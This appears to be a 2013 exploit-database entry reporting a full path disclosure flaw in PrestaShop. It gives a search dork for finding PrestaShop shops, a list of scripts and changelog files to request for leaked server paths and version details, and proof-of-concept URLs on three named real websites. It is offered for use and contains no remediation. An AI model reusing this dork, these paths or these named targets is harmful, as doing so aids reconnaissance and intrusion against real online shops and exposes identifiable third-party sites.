PrestaShop Full Path Disclosure Vulnerability

2013-03-18T00:00:00
ID 1337DAY-ID-20521
Type zdt
Reporter Smash_
Modified 2013-03-18T00:00:00

Description

Title: PrestaShop Full Path Disclosure

Date: 16.03.2013

Tested on: FreeBSD 6.2

Version: All

Dork: intext:"Powered by PrestaShop"

Contact: [email protected] Full Path Disclosure:

/footer.php /header.php /pagination.php /product-sort.php /modules/hipay/mapi/mapi_tax.php /init.php /config/smarty.config.inc.php Changelog: /CHANGELOG /CHANGELOG.txt PoC: http://www.kravcovnia.pl/footer.php http://www.vinobar.pl/footer.php http://wzrok24.pl/footer.php Greetz: All friends from DevilTeam!

                                        
                                            Full Path Disclosure:
/footer.php
/header.php
/pagination.php
/product-sort.php
/modules/hipay/mapi/mapi_tax.php
/init.php
/config/smarty.config.inc.php

Changelog:
/CHANGELOG
/CHANGELOG.txt

#  0day.today [2018-04-13]  #